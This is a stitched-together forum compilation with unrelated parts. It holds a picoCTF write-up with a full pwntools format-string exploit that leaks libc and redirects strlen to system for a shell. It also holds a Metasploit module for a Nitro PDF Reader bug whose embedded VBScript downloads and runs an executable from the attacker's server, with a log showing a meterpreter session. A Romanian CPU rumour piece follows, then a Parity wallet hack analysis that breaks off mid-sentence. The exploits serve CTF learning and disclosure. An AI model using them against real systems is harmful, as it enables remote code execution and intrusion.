arbitrary read/write: We can place exit's address in the format string (which will be stored on the stack). Use with the %$[number] specifier to refer to its offset. Use the %[number] modifier to pad whatever is already printed to a certain number. Use the %n specifier to write that certain number to exit's address. Let's begin exploring with the terminal and soon we will move to python using pwntools4. By the way, not sure if you noticed it, but I decided to include more "live" footage this time than just screenshots. The concept can be confusing so I'll do my best to be as thorough as possible. Let the pwning begin: 56 At this point I'd like to thank @exploit who reminded me of the stack alignment because I was stuck trying to figure out why the A's were getting mixed up. Watch each demo carefully. If I feel there is a need to explain myself further I'll add comments below the asciinema instance. You are more than welcome to ask me questions in the comments. Anyway, as shown in the demo, we begin our testing by entering A's in our format string and then %p's in order to print them out. We found out that they are the 15th value. Let's try the %15$p trick this time. 27 Looking good so far. Let's automate it in python so we won't have to enter it every time. # demo.py from pwn import * p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "A"*8 payload += "|%15$p|".rjust(8) p.sendline(payload) p.recvline() p.interactive() Awesome, now we've got control over our input and we know its exact position. Let's try with exit's GOT entry this time, 0x601258. Remember, we are dealing with 8-byte chunks so we need to pad the address to 8-bytes long: # demo.py from pwn import * p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += p64(0x601258) # \x58\x12\x60\x00\x00\x00\x00\x00 payload += "|%15$p|".rjust(8) p.sendline(payload) p.recvline() p.interactive() Let's see what it does in action. 33 Hm, something is wrong here. Not only did we not get the address, but not even the "|...|" part. Why? Well, in case you didn't know, printf will stop at a null-byte. Which makes sense! Exit's GOT entry does have a null-byte. Meaning, printf will read up to '\x60' and then it will stop. How can we fix that? Easy, we just move our address after the format specifier. #demo.py from pwn import * EXIT_GOT = 0x601258 p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "|%16$p|".rjust(8) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() Now our script should work. I've changed exit's position in the string and updated '%15$p' to '%16$p'. I'll let you think about why I changed the specifier offset. After all this explanation it should be clear. Let's run our script, shall we? 32 Look at that, our address is there! Problem fixed. Unfortunately that's the bummer with 64-bit addresses but when it comes to 32-bit ones, we wouldn't have that issue. Either way, the fix was simple. Let's recap: We've managed to get control over our input. We placed exit's address in the string. In doing so, we managed to find its offset. Knowing its offset we can use %offset$n to write to that address. Thinking back to our plan, our goal is to overwrite exit's address with loop()'s. I know beforehand that exit's GOT entry points to 0x400736. That's because exit has not been called yet and thus it points to its PLT entry which has executable code to find exit's address in libc. So what we want is this: 0x400736 => 0x4009bd We don't have to overwrite the whole address as you can see. Only its 2 lower bytes. Now I will demonstrate how %n can be used. You will notice that demo will be kinda slow. That's because asciinema does not record 2 terminals at a time and I'll be using two. One to run the binary and one to use gdb and attach to it. Updated script: #demo.py from pwn import * EXIT_GOT = 0x601258 p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "|%17$n|".rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() First I will show what's happening without the help of GDB and then I'll fire it up. 24 We get a segfault, which makes sense, right? We overwrote exit's address with the amount of characters being printed, which is too little and thus not a legal address to jump to. Let's see what GDB has to say about this. 33 As shown above, I attached to the running binary with GDB and pressed enter in my 2nd terminal to send the input. It's pretty clear that exit's address got overwritten. 0x400736 => 0x0000000d This is definitely not what we want as the result, but we are getting there! We can use our printf magic tricks and make it work. %[number] In order to increase the number of bytes being printed. %hn specifier I didn't mention it earlier, but it's time to introduce you to yet another dark side of printf. With %hn we can overwrite the address partially. %hn has the ability to overwrite only the 2 bytes of our variable, exit's address in our case. I said it earlier that we don't need to overwrite the whole address, only its lower 2 bytes since the higher 2 bytes are the same. I know, I know, confusing, but hey, that's why a demo is on its way! Updated script: #demo.py from pwn import * EXIT_GOT = 0x601258 p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += "|%17$hn|".rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() 12 Bam! We went from 0x0000000d to 0x0040000c. Partial overwrite folks! Now let's think carefully. We want 0x09bd to be the 2 lower bytes. All we have to do is: Convert 0x09bd to decimal. Use that number in the form of %2493x. You will notice that the 2 lower bytes will be slightly off but we can adjust that as you'll see soon. Let's update our script: #demo.py from pwn import * EXIT_GOT = 0x601258 LOOP = 0x4009bd p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += ("%%%du|%%17$hn|" % 2493).rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() 11 Looks like it worked! Well, almost. We just need to subtract 6 and we should be golden! Updated script: #demo.py from pwn import * EXIT_GOT = 0x601258 LOOP = 0x4009bd p = process(['./console', 'log']) pause() payload = "exit".ljust(8) payload += ("%%%du|%%17$hn|" % 2487).rjust(16) payload += p64(EXIT_GOT) p.sendline(payload) p.interactive() 7 Boom! We successfully overwrote exit's address with loop's. So every time exit gets called, we will jump right back in the beginning and we will be able to enter a different format string, but this time to leak libc's base address and more. Leaking Libc Time to move on with our plan. Leaking libc is not that hard. With a little bit of code we can resolve its base address in no time. def leak(addr): info("Leaking libc base address") payload = "exit".ljust(8) payload += "|%17$s|".rjust(8) payload += "blablala" payload += p64(addr) p.sendline(payload) p.recvline() data = p.recvuntil("blablala") fgets = data.split('|')[1] fgets = hex(u64(fgets.ljust(8, "\x00"))) return fgets I will not explain every technical aspect of the snippet since this is not a Python tutorial. This is what I tried to achieve overall: The goal is to leak libc's base address. We can accomplish that by leaking a libc's function address. Fgets() in our case would be a wise choice since it's already been resolved. In particular, I entered fgets's GOT entry which contains the actual address. The %s specifier will treat the address we entered as a string of bytes. Meaning, it will try to read what's INthe GOT entry. The output will be a stream of raw bytes. I used the u64() function to convert the raw bytes to an actual address. Once we find its address, we subtract its libc offset from it and we get the base address. I made the exploit a little cleaner: #demo.py from pwn import * import sys HOST = 'shell2017.picoctf.com' PORT = '47232' LOOP = 0x4009bd STRLEN_GOT = 0x601210 EXIT_GOT = 0x601258 FGETS_GOT = 0x601230 FGETS_OFFSET = 0x6dad0 SYSTEM_OFFSET = 0x45390 STRLEN_OFFSET = 0x8ab70 def info(msg): log.info(msg) def leak(addr): info("Leaking libc base address") payload = "exit".ljust(8) payload += "|%17$s|".rjust(8) payload += "blablala" payload += p64(addr) p.sendline(payload) p.recvline() data = p.recvuntil("blablala") fgets = data.split('|')[1] fgets = hex(u64(fgets.ljust(8, "\x00"))) return fgets def overwrite(addr, pad): payload = "exit".ljust(8) payload += ("%%%du|%%17$hn|" % pad).rjust(16) payload += p64(addr) p.sendline(payload) p.recvline() return def exploit(p): info("Overwriting exit with loop") pad = (LOOP & 0xffff) - 6 overwrite(EXIT_GOT, pad) FGETS_LIBC = leak(FGETS_GOT) LIBC_BASE = hex(int(FGETS_LIBC, 16) - FGETS_OFFSET) SYSTEM_LIBC = hex(int(LIBC_BASE, 16) + SYSTEM_OFFSET) STRLEN_LIBC = hex(int(LIBC_BASE, 16) + STRLEN_OFFSET) info("system: %s" % SYSTEM_LIBC) info("strlen: %s" % STRLEN_LIBC) info("libc: %s" % LIBC_BASE) p.interactive() if __name__ == "__main__": log.info("For remote: %s HOST PORT" % sys.argv[0]) if len(sys.argv) > 1: p = remote(sys.argv[1], int(sys.argv[2])) exploit(p) else: p = process(['./console', 'log']) pause() exploit(p) Just some notes on how to find the libc the binary uses and how to find the function offsets: > ldd console [...] libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 [...] > readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep fgets [...] 753: 000000000006dad0 417 FUNC WEAK DEFAULT 13 fgets@@GLIBC_2.2.5 [...] Let's watch the magic happen: 27 As you can see, in every execution the libc's base changes, aka ASLR. But that does not affect us anymore since we overwrote exit with loop(). Jumping to system 2/3 of our plan is successfully done. All that is left is redirecting code execution to system with the argument being /bin/sh or sh ofcourse. In case you didn't notice, I purposely picked strlen as the victim. Why is that? Both system and strlen are invoked with one argument. Thus, once we overwrite strlen with system, system will read what is supposedly strlen's argument and execute that command. Looks like we have to go back to step #1 of our exploit. Meaning, we have to overwrite strlen's libc address with system's. Luckily for us, they share the same base address so practically we only have to overwrite the lower 4 bytes. For example, let's use one of our script's output. +-----------------------------+ | | 0x7fb4|21ec|0b70| (strlen) => 0x7fb4|21e7|b390| (system) | | +----------------------------+ This is how we can accomplish that: # subtract -7 at the end to get the correct offset WRITELO = int(hex(int(SYSTEM_LIBC, 16) & 0xffff), 16) - 7 WRITEHI = int(hex((int(SYSTEM_LIBC, 16) & 0xffff0000) >> 16), 16) - 7 # call prompt in order to resolve strlen's libc address. p.sendline("prompt asdf") p.recvline() info("Overwriting strlen with system") overwrite(STRLEN_GOT, WRITELO) overwrite(STRLEN_GOT+2, WRITEHI) The only part that deserves a bit of explanation is this one: overwrite(STRLEN_GOT, WRITELO) overwrite(STRLEN_GOT+2, WRITEHI) It seems like we overwrite the libc address via two short writes. It could be possible to do it with one but that would print a pretty big amount of padding bytes on the screen so with two writes is a bit cleaner. The concept is still the same. Let's visualize it as well: strlen GOT = 0x601210 Global Offset Table +--------------------+ | ... | +--------------------+ | ... | ... +--------------------+ | 0x21 | 0x601213 / +--------------------+ strlen + 0x2 | | 0xec | 0x601212 \ +--------------------+ | 0x0b | 0x601211 / +--------------------+ strlen + 0x0 | | 0x70 | 0x601210 \ +--------------------+ Now it should be more clear why and how we overwrite 2 bytes with each write. I'll show you each write separately with GDB and then the full exploit. Because I'll try to provide a view of both the exploit and GDB, the demos might be a bit slow because I'll be jumping around the terminals. Stay with me. overwrite(STRLEN_GOT, WRITELO) Exploit (skip a few seconds): 8 GDB: 8 You might noticed that at some point in the exploit I typed "prompt asdf". The reason I did that was to resolve strlen's address since it's the first time being called. I set a breakpoint in GDB at that point and stepped through the process. First time it went through the PLT stub code in order to resolve itself and once I typed c, its address was resolved and we overwrote its 2 lower bytes. Before: system: 0x7fea06160390 strlen: 0x7fea061a5b70 After: strlen: 0x7fea06160397 The 2 lower bytes are 7 bytes off which is why in the exploit you saw the -7 subtraction. Sometimes it ended up being 5 or 6 bytes off, but it doesn't matter. Just adjust the value to your needs. In your system it should be the same offset more or less. Let's execute the exploit with both writes this times. Exploit (skip a few seconds): 4 GDB: 10 Before: system: 0x7fe7a273a390 strlen: 0x7fe7a277fb70 After: strlen: 0x7fe7a273a390 Voila! We successfully overwrote strlen with system! Let's fire up the exploit without GDB and get shivers. PoC Demo 34 Conclusion That's been it folks. I hope I didn't waste your time. If you feel puzzled, don't get discouraged, just re-read it a couple of times and research the same topic on google. After reading plenty of examples and implementing one of your own, you'll be 1337. By the way, the task was a remote one, but the server was kinda slow when the CTF ended so I implemented it locally. The only change that you'd have to make is adjust the libc offsets, which is quite trivial since the libc was provided. Thank you for taking the time to read my write-up. Feedback is always welcome and much appreciated. If you have any questions, I'd love to help you out if I can. Finally, if you spot any errors in terms of code/syntax/grammar, please let me know. I'll be looking out for mistakes as well. You can find my exploit and the binary (source code, libc included) here22. Peace out,@_py Sursa: https://0x00sec.org/t/picoctf-write-up-bypassing-aslr-via-format-string-bug/1920
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::FileDropper include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution', 'Description' => %q{ This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro PDF Reader version 11. The saveAs() Javascript API function allows for writing arbitrary files to the file system. Additionally, the launchURL() function allows an attacker to execute local files on the file system and bypass the security dialog Note: This is 100% reliable. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit 'sinn3r' # help with msf foo! ], 'References' => [ [ 'CVE', '2017-7442' ], [ 'URL', 'https://www.gonitro.com/' ], ], 'DefaultOptions' => { 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => [ # truly universal [ 'Automatic', { } ], ], 'DisclosureDate' => 'XXXX', 'DefaultTarget' => 0)) register_options([ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]), ], self.class) end def build_vbs(url, stager_name) name_xmlhttp = rand_text_alpha(2) name_adodb = rand_text_alpha(2) vbs = %Q|<script language="VBScript"> Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP") #{name_xmlhttp}.open "GET","http://#{url}",False #{name_xmlhttp}.send Set #{name_adodb} = CreateObject("ADODB.Stream") #{name_adodb}.Open #{name_adodb}.Type=1 #{name_adodb}.Write #{name_xmlhttp}.responseBody #{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2 set shellobj = CreateObject("wscript.shell") shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0 </script>| vbs.gsub!(/ /,'') return vbs end def on_request_uri(cli, request) if request.uri =~ /\.exe/ print_status("Sending second stage payload") return if ((p=regenerate_payload(cli)) == nil) data = generate_payload_exe( {:code=>p.encoded} ) send_response(cli, data, {'Content-Type' => 'application/octet-stream'} ) return end end def exploit # In order to save binary data to the file system the payload is written to a .vbs # file and execute it from there. @payload_name = rand_text_alpha(4) @temp_folder = "/Windows/Temp" register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta") if datastore['SRVHOST'] == '0.0.0.0' lhost = Rex::Socket.source_address('50.50.50.50') else lhost = datastore['SRVHOST'] end payload_src = lhost payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe" stager_name = rand_text_alpha(6) + ".vbs" pdf = %Q|%PDF-1.7 4 0 obj << /Length 0 >> stream | pdf << build_vbs(payload_src, stager_name) pdf << %Q| endstream endobj 5 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction [ 5 0 R /Fit ] /Names << /JavaScript << /Names [ (EmbeddedJS) << /S /JavaScript /JS ( this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta'); app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta'); ) >> ] >> >> >> endobj 2 0 obj <</Type/Pages/Count 1/Kids [ 5 0 R ]>> endobj 3 0 obj <<>> endobj xref 0 6 0000000000 65535 f 0000000166 00000 n 0000000244 00000 n 0000000305 00000 n 0000000009 00000 n 0000000058 00000 n trailer << /Size 6 /Root 1 0 R >> startxref 327 %%EOF| pdf.gsub!(/ /,'') file_create(pdf) super end end =begin saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc [*] Processing scripts/nitro.rc for ERB directives. resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (scripts/nitro.rc)> set LHOST 172.16.175.1 LHOST => 172.16.175.1 resource (scripts/nitro.rc)> exploit [*] Exploit running as background job. [*] Started reverse TCP handler on 172.16.175.1:4444 msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.100.4:8080/ [*] Server started. [*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload [*] Sending stage (957487 bytes) to 172.16.175.232 [*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500 [+] Deleted C:/Windows/Temp/UOIr.hta msf exploit(nitro_reader_jsapi) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 2412 created. Channel 2 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\researcher\Desktop> =end Sursa: https://gist.github.com/stevenseeley/725c6c0be2ff76494c23db730fd30b6d
-
Un procesor Intel Coffee Lake cu 6 nuclee a fost zărit by unacomn on 24/07/2017 Zvonurile despre procesoarele Intel din seria Coffee Lake continuă, de această dată și cu imagini. Sau mai bine zis, cu o imagine. Și-a făcut apariția pe internet o poză a unui procesor Coffee Lake, făcută în CPU-Z. Autenticitatea acestei imagini nu poate fi verificată în acest moment, așa că nu am cum să vă ofer vreo garanție că ar fi autentică. Se potrivește însă cu zvonurile de până acum. Această imagine ar fi de la un procesor i7 din seria Coffee Lake, luând în considerare faptul că are Hyperthreading. Denumirea procesorului nu este dată, fiind o mostră de testare. Ca standard, această variantă funcționează la 3.5GHz, cu o frecvență curentă de 3.9GHz, alături de un TDP de 80W. Chiar dacă imaginea este autentică, aceste caracteristici cu siguranță nu sunt finale, dar măcar ne dau o idee generală despre forma procesorului și cât de aproape este de lansare. Pentru ca un astfel de leak să aibă loc, în general procesoarele sunt la doar câteva luni de lansare. Faptul că au început deja să fie listate laptop-uri ce se folosesc de arhitectura Coffee Lake este încă un semn că Intel ar putea pregăti o lansare pentru toamna acestui an. Seria Coffee Lake iese în evidență prin ridicarea numărului de nuclee disponibile pe platforma dedicată publicului general la șase. Ar fi pentru prima dată când Intel face o astfel de schimbare în ultimul deceniu. [Videocardz] Sursa: https://zonait.tv/un-procesor-intel-coffee-lake-cu-6-nuclee-a-fost-zarit/ I se mai zice si "Procesoru' lu' @aelius"
-
- 2
-
-
-
[Security Report] A Security Audit of Firefox Accounts
Nytro replied to SirGod's topic in Tutoriale in engleza
Da, misto. La noi nici macar "union select" nu mai e la moda. -
Asa da...
-
Haseeb Qureshi Software engineer. @Airbnb alum. Instructor @Outco. Writer. Effective Altruist. Blockchain believer. Former poker pro. Jul 20 A hacker stole $31M of Ether — how it happened, and what it means for Ethereum Yesterday, a hacker pulled off the second biggest heist in the history of digital currencies. Around 12:00 PST, an unknown attacker exploited a critical flaw in the Parity multi-signature wallet on the Ethereum network, draining three massive wallets of over $31,000,000 worth of Ether in a matter of minutes. Given a couple more hours, the hacker could’ve made off with over $105,000,000 from vulnerable wallets. But someone stopped them. Having sounded the alarm bells, a group of benevolent white-hat hackers from the Ethereum community rapidly organized. They analyzed the attack and realized that there was no way to reverse the thefts, yet many more wallets were vulnerable. Time was of the essence, so they saw only one available option: hack the remaining wallets before the attacker did. By exploiting the same vulnerability, the white-hats hacked all of the remaining at-risk wallets and drained their accounts, effectively preventing the attacker from reaching any of the remaining $77,000,000. Yes, you read that right. To prevent the hacker from robbing any more banks, the white-hats wrote software to rob all of the remaining banks in the world. Once the money was safely stolen, they began the process of returning the funds to their respective account holders. The people who had their money saved by this heroic feat are now in the process of retrieving their funds. It’s an extraordinary story, and it has significant implications for the world of cryptocurrencies. It’s important to understand that this exploit was not a vulnerability in Ethereum or in Parity itself. Rather, it was a vulnerability in the default smart contract code that the Parity client gives the user for deploying multi-signature wallets. This is all pretty complicated, so to make the details of this clear for everyone, this post is broken into three parts: What exactly happened? An explanation of Ethereum, smart contracts, and multi-signature wallets. How did they do it? A technical explanation of the attack (specifically for programmers). What now? The attack’s implications about the future and security of smart contracts. If you are familiar with Ethereum and the crypto world, you can skip to the second section. 1. What exactly happened? There are three building blocks to this story: Ethereum, smart contracts, and digital wallets. Ethereum is a digital currency invented in 2013 — a full 4 years after the release of Bitcoin. It has since grown to be the second largest digital currency in the world by market cap — $20 billion, compared to Bitcoin’s $40 billion. Like all cryptocurrencies, Ethereum is a descendant of the Bitcoin protocol, and improves on Bitcoin’s design. But don’t be fooled: though it is a digital currency like Bitcoin, Ethereum is much more powerful. While Bitcoin uses its blockchain to implement a ledger of monetary transactions, Ethereum uses its blockchain to record state transitions in a gigantic distributed computer. Ethereum’s corresponding digital currency, ether, is essentially a side effect of powering this massive computer. To put it another way, Ethereum is literally a computer that spans the entire world. Anyone who runs the Ethereum software on their computer is participating in the operations of this world-computer, the Ethereum Virtual Machine (EVM). Because the EVM was designed to be Turing-complete(ignoring gas limits), it can do almost anything that can be expressed in a computer program. Let me be emphatic: this is crazy stuff. The crypto world is ebullient about the potential of Ethereum, which has seen its value skyrocket in the last 6 months. The developer community has rallied behind it, and there’s a lot of excitement about what can be built on top of the EVM — and this brings us to smart contracts. Smart contracts are simply computer programs that run on the EVM. In many ways, they are like normal contracts, except they don’t need lawyers or judges to interpret them. Instead, they are compiled to bytecode and interpreted unambiguously by the EVM. With these programs, you can (among other things) programmatically transfer digital currency based solely on the rules of the contract code. Of course, there are things normal contracts do that smart contracts can’t — smart contracts can’t easily interact with things that aren’t on the blockchain. But smart contracts can also do things that normal contracts can’t, such as enforce a set of rules entirely through unbreakable cryptography. This leads us to the notion of wallets. In the world of digital currencies, wallets are how you store your assets. You gain access to your wallet using essentially a secret password, also known as your private key (simplified a bit). There are many different types of wallets that confer different security properties, such as withdrawal limits. One of the most popular types is the multi-signature wallet. In a multi-signature wallet, there are several private keys that can unlock the wallet, but just one key is not enough to unlock it. If your multi-signature wallet has 3 keys, for example, you can specify that at least 2 of the 3 keys must be provided to successfully unlock it. This means that if you, your father, and your mother are each signatories on this wallet, even if a criminal hacked your mother and stole her private key, they could still not access your funds. This leads to much stronger security guarantees, so multi-sigs are a standard in wallet security. This is the type of wallet the hacker attacked. So what went wrong? Did they break the private keys? Did they use a quantum computer, or some kind of cutting-edge factoring algorithm? Nope, all the cryptography was sound. The exploit was almost laughably simple: they found a programmer-introduced bug in the code that let them re-initialize the wallet, almost like restoring it to factory settings. Once they did that, they were free to set themselves as the new owners, and then walk out with everything. 2. How did this happen? What follows is a technical explanation of exactly what happened. If you’re not a developer, feel free to skip to the next section, since this is going to be programming-heavy. Ethereum has a fairly unique programming model. On Ethereum, you write code by publishing contracts (which you can think of as objects), and transactions are executed by calling methods on these objects to mutate their state. In order to run code on Ethereum, you need to first deploy the contract (the deployment is itself a transaction), which costs a small amount of Ether. You then need to call methods on the contract to interact with it, which costs more Ether. As you can imagine, this incentivizes a programmer to optimize their code, both to minimize transactions and minimize computation costs. One way to reduce costs is to use libraries. By making your contract call out to a shared library that was deployed at a previous time, you don’t have to re-deploy any shared code. In Ethereum, keeping your code DRY will directly save you money. The default multi-sig wallet in Parity did exactly this. It held a reference to a shared external library which contained wallet initialization logic. This shared library is referenced by the public key of the library contract. // FIELDS address constant _walletLibrary = 0xa657491c1e7f16adb39b9b60e87bbb8d93988bc3; The library is called in several places, via an EVM instruction called DELEGATECALL, which does the following: for whatever method that calls DELEGATECALL, it will call the same method on the contract you're delegating to, but using the context of the current contract. It's essentially like a supercall, except without the inheritance part. (The equivalent in JavaScript would be OtherClass.functionName.apply(this, args).) Here’s an example of this in their multi-sig wallet: the isOwner method just delegates to the shared wallet library's isOwner method, using the current contract's state: function isOwner(address _addr) constant returns (bool) { return _walletLibrary.delegatecall(msg.data); } This is all innocent enough. The multi-sig wallet itself contained all of the right permission checks, and they were sure to rigorously enforce authorization on all sensitive actions related to the wallet’s state. But they made one critical mistake. Solidity allows you to define a “fallback method.” This is the method that gets called when there’s no method that matches a given method name. You define it by not giving it a name: function() { // do stuff here for all unknown methods } The Parity team decided to let any unknown method that sent Ether to the contract just default to depositing the sent Ether. function() payable { // payable is just a keyword that means this method can receive/pay Ether if (msg.value > 0) { // just being sent some cash? Deposit(msg.sender, msg.value); } throw; } But they took it a step further, and herein was their critical mistake. Below is the actual code that was attacked. function() payable { // just being sent some cash? if (msg.value > 0) Deposit(msg.sender, msg.value); else if (msg.data.length > 0) _walletLibrary.delegatecall(msg.data); } Basically: If the method name is not defined on this contract… And there’s no ether being sent in the transaction… And there is some data in the message payload… Then it will call the exact same method if it’s defined in _walletLibrary, but in the context of this contract. Using this, the attacker called a method called initWallet(), which was not defined on the multisig contract but was defined in the shared wallet library: function initWallet(address[] _owners, uint _required, uint _daylimit) { initDaylimit(_daylimit); initMultiowned(_owners, _required); } Which calls the initMultiowned method... function initMultiowned(address[] _owners, uint _required) { m_numOwners = _owners.length + 1; m_owners[1] = uint(msg.sender); m_ownerIndex[uint(msg.sender)] = 1; for (uint i = 0; i < _owners.length; ++i) { m_owners[2 + i] = uint(_owners[i]); m_ownerIndex[uint(_owners[i])] = 2 + i; } m_required = _required; } Do you see what just happened there? The attacker essentially reinitialized the contract by delegating through the library method, overwriting the owners on the original contract. They and whatever array of owners they supply as arguments will be the new owners. Given that they now control the entire wallet, they can trivially extract the remainder of the balance. And that’s precisely what they did. The initWallet: https://etherscan.io/tx/0x707aabc2f24d756480330b75fb4890ef6b8a26ce0554ec80e3d8ab105e63db07 The transfer: https://etherscan.io/tx/0x9654a93939e98ce84f09038b9855b099da38863b3c2e0e04fd59a540de1cb1e5 So what was ultimately the vulnerability? You could argue there were two. First, the initWallet and initMultiowned in the wallet library were not marked as internal (this is like a private method, which would prevent this delegated call), and those methods did not check that the wallet wasn't already initialized. Either check would've made this hack impossible. The second vulnerability was the raw delegateCall. You can think of this as equivalent to a raw eval statement, running on a user-supplied string. In an attempt to be succinct, this contract used metaprogramming to proxy potential method calls to an underlying library. The safer approach here would be to whitelist specific methods that the user is allowed to call. The trouble, of course, is that this is more expensive in gas costs (since it has to evaluate more conditionals). But when it comes to security, we probably have to get over this concern when writing smart contracts that move massive amounts of money. So that was the attack. It was a clever catch, but once you point it out, it seems almost elementary. The attacker then jumped on this vulnerability for three of the largest wallets they could find — but judging from the transaction times, they were doing this entirely manually. The white-hat group was doing this at scale using scripts, and that’s why they were able to beat the attacker to the punch. Given this, it’s unlikely that the attacker was very sophisticated in how they planned their attack. You might ask the question though — why don’t they just roll back this hack, like they did with the DAO hack? Unfortunately that’s not really possible. The DAO hack was unique in that when the attacker drained the DAO into a child DAO, the funds were frozen for many days inside a smart contract before they could be released to the attacker. This prevented any of the stolen funds from going into circulation, so the stolen Ether was effectively siloed. This gave the Ethereum community plenty of time to conduct a public quorum about how to deal with the attack. In this attack, the attacker immediately stole the funds and could start spending them. A hard fork would be impractical–what do you do about all of the transactions that occur downstream? What about the people who innocently traded assets with the attacker? Once the ether they’ve stolen gets laundered and enters general circulation, it’s like counterfeit bills circulating in the economy — it’s easy to stop when it’s all in one briefcase, but once everyone’s potentially holding a counterfeit bill, you can’t really turn back the clock anymore. So the transaction won’t get reversed. The $31M loss stands. It’s a costly, but necessary lesson. So what should we take away from this? 3. What does this attack mean for Ethereum? There are several important takeaways here. First, remember, this was not a flaw in Ethereum or in smart contracts in general. Rather, it was a developer error in a particular contract. So who were the crackpot developers who wrote this? They should’ve known better, right? The developer here was Gavin Wood, one of the co-creators of Ethereum, and the inventor of Solidity, the smart contract programming language. The code was also reviewed by other Parity contributors. This is basically the highest standard of programming that exists in the Ethereum ecosystem. Gavin is human. He made a mistake. And so did the reviewers who audited his code. I’ve read some comments on Reddit and HackerNews along the lines of: “What an obvious mistake! How was it even possible they missed this?” (Ignoring that the “obvious” vulnerability was introduced in January and only now discovered.) When I see responses like this, I know the people commenting are not professional developers. For a serious developer, the reaction is instead: damn, that was a dumb mistake. I’m glad I wasn’t the one who made it. Mistakes of this sort are routinely made in programming. All programs carry the risk of developer error. We have to throw off the mindset of “if they were just more careful, this wouldn’t have happened.” At a certain scale, carefulness is not enough. As programs scale to non-trivial complexity, you have to start taking it as a given that programs are probably not correct. No amount of human diligence or testing is sufficient to prevent all possible bugs. Even organizations like Google or NASA make programming mistakes, despite the extreme rigor they apply to their most critical code. We would do well to take a page from site reliability practices at companies like Google and Airbnb. Whenever there’s a production bug or outage, they do a postmortem analysis and distribute it within the company. In these postmortems, there is always a principle of never blaming individuals. Blaming mistakes on individuals is pointless, because all programmers, no matter how experienced, have a nonzero likelihood of making a mistake.Instead, the purpose of a postmortem is to identify what in the process allowed that mistake to get deployed. The problem was not that Gavin Wood forgot to add internal to the wallet library, or that he did a raw delegateCall without checking what method was being called. The problem is that his programming toolchain allowed him to make these mistakes. As the smart contract ecosystem evolves, it has to evolve in the direction of making these mistakes harder, and that means making contracts secure by default. This leads me to my next point. Strength is a weakness when it comes to programming languages. The stronger and more expressive a programming language is, the more complex its code becomes. Solidity is a very complex language, modeled to resemble Java. Complexity is the enemy of security. Complex programs are more difficult to reason about and harder to identify edge cases for. I think that languages like Viper (maintained by Vitalik Buterin) are a promising step in this direction. Viper includes by default basic security mechanisms, such as bounded looping constructs, no integer overflows, and prevents other basic bugs that developers shouldn’t have to reason about. The less the language lets you do, the easier it is to analyze and prove properties of a contract. Security is hard because the only way to prove a positive statement like “this contract is secure” is to disprove every possible attack vector: “this contract cannot be re-initialized,” “its funds cannot be accessed except by the owners,” etc. The fewer possible attack vectors you have to consider, the easier it is to develop a secure contract. A simpler programming model also allows things like formal verification and automatic test generation. These are areas under active research, but just as smart contracts have incorporated cutting-edge cryptography, they also should start incorporating the leading edge of programming language design. There is a bigger lesson here too. Most of the programmers who are getting into this space, myself included, come from a web development background, and the blockchain toolchain is designed to be familiar for web developers. Solidity has achieved tremendous adoption in the developer community because of its familiarity to other forms of programming. In a way, this may end up being its downfall. The problem is, blockchain programming is fundamentally different from web development. Let me explain. Before the age of the client-server web model, most programming was done for packaged consumer software or on embedded systems. This was before the day of automatic software updates. In these programs, a shipped product was final — you released one form of your software every 6 months, and if there was a bug, that bug would have to stand until the next release. Because of this longer development cycle, all software releases were rigorously tested under all conceivable circumstances. Web development is far more forgiving. When you push bad code to a web server, it’s not a big deal if there’s a critical mistake — you can just roll back the code, or roll forward with a fix, and all is well because you control the server. Or if the worst happens and there’s an active breach or a data leak, you can always stop the bleeding by shutting off your servers and disconnecting yourself from the network. These two development models are fundamentally different. It’s only out of something like web development that you can get the motto “move fast and break things.” Most programmers today are trained on the web development model. Unfortunately, the blockchain security model is more akin to the older model. In blockchain, code is intrinsically unrevertible. Once you deploy a bad smart contract, anyone is free to attack it as long and hard as they can, and there’s no way to take it back if they get to it first. Unless 